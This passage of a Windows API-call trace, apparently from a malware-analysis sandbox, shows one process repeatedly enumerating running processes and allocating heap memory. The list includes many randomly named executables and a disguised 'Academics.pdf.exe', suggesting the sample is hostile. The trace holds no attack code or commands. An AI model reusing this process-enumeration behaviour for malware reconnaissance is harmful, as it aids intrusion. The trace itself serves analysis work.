[0297.521] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0297.522] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0297.523] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0297.524] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0297.525] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0297.526] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0297.526] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0297.527] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0297.528] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0297.529] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0297.530] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0297.530] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0297.531] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0297.532] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0297.533] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0297.534] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0297.534] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0297.535] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0297.536] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0297.537] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0297.538] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0297.538] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0297.539] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0297.540] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0297.541] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0297.542] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0297.543] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0297.544] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0297.544] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0297.545] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0297.546] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0297.547] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0297.548] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0297.548] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0297.549] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0297.550] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0297.551] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0297.552] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0297.552] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0297.553] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0297.554] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0297.555] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0297.556] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0297.557] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0297.557] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0297.558] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0297.559] CloseHandle (hObject=0x294) returned 1 [0297.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0297.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0297.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0297.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0297.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0297.559] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0297.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0297.559] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0297.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0297.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0297.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0297.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0297.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0297.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0297.560] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0297.562] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0297.563] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0297.563] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0297.564] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0297.565] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0297.566] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0297.567] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0297.568] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0297.568] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0297.569] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0297.570] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0297.571] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0297.572] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0297.573] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0297.574] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0297.575] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0297.575] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0297.576] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0297.577] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0297.578] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0297.579] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0297.580] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0297.580] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0297.581] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0297.582] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0297.583] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0297.584] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0297.584] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0297.585] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0297.586] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0297.587] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0297.588] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0297.589] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, 